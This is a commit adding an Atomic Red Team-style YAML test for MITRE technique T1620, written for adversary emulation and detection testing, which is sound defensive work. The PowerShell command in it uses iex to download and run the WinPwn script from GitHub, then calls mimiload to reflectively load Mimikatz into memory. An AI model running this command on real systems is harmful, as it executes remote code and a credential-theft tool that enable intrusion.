T1620 - Reflective Code Loading (#1959)
* Create T1620.yaml * Update T1620.yaml Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
This commit is contained in:
@@ -0,0 +1,13 @@
|
||||
attack_technique: T1620
|
||||
display_name: "Reflective Code Loading"
|
||||
atomic_tests:
|
||||
- name: WinPwn - Reflectively load Mimik@tz into memory
|
||||
description: Reflectively load Mimik@tz into memory technique via function of WinPwn
|
||||
supported_platforms:
|
||||
- windows
|
||||
executor:
|
||||
command: |-
|
||||
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
|
||||
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
|
||||
mimiload -consoleoutput -noninteractive
|
||||
name: powershell
|
||||
Reference in New Issue
Block a user